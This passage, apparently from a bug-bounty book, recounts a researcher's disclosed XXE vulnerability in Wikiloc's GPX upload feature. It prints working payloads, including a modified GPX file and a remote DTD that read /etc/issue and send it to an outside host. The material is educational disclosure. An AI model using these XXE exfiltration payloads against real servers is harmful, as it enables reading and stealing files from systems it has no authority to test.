On January 11th, 2016, a researcher called David Sopas published a report about an XXE in an application named Wikiloc, which is an application for sharing the best outdoor trails for hiking, cycling, and many other activities. This website/app has more than a million members, so there's a lot of information.
David Sopas registered an account in the application and was looking for a bicycle, but ended up exploiting a vulnerability...yes, you know, these things happen.
He started to analyze the request. He downloaded a .gpx file to understand the XML structure used by Wikiloc, and he modified the file with these lines:
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://www.davidsopas.com/XXE" > ]> <gpx version="1.0" creator="GPSBabel - http://www.gpsbabel.org" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.topografix.com/GPX/1/0" xsi:schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd"> <time>2015-10-29T12:53:09Z</time> <bounds minlat="40.734267000" minlon="-8.265529000" maxlat="40.881475000" maxlon="-8.037170000"/> <trk> <name>&xxe;</name> <trkseg> <trkpt lat="40.737758000" lon="-8.093361000"> <ele>178.000000</ele> <time>2009-01-10T14:18:10Z</time> (...)
The difference between this vulnerability and the Facebook vulnerability that I explained before is that, here, David Sopas did not need a DTD because he used the same structure in the file he downloaded.
After he uploaded the file, he got a response:
GET 144.76.194.66 /XXE/ 10/29/15 1:02 PM Java/1.7.0_51
David Sopas verified the IP address, just to confirm that it was a Wikiloc server and, after doing so, he modified the XML file again:
<!DOCTYPE roottag [ <!ENTITY % file SYSTEM "file:///etc/issue"> <!ENTITY % dtd SYSTEM "http://www.davidsopas.com/poc/xxe.dtd"> %dtd;]> <gpx version="1.0" creator="GPSBabel - http://www.gpsbabel.org" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.topografix.com/GPX/1/0" xsi:schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd"> <time>2015-10-29T12:53:09Z</time> <bounds minlat="40.734267000" minlon="-8.265529000" maxlat="40.881475000" maxlon="-8.037170000"/> <trk> <name>&send;</name> (...)
As a result, in this case, he included the new line to get the file, and this time he needed to create a DTD:
<?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://www.davidsopas.com/XXE?%file;'>"> %all;
We can take a tip from this report. For testing purposes, you can just download a valid XML and modify it with a little request, just to get a response and confirm that it's vulnerable. It's easy because you're following the XML structure.
If you want to read more about this bug, visit the following link: https://www.davidsopas.com/wikiloc-xxe-vulnerability/.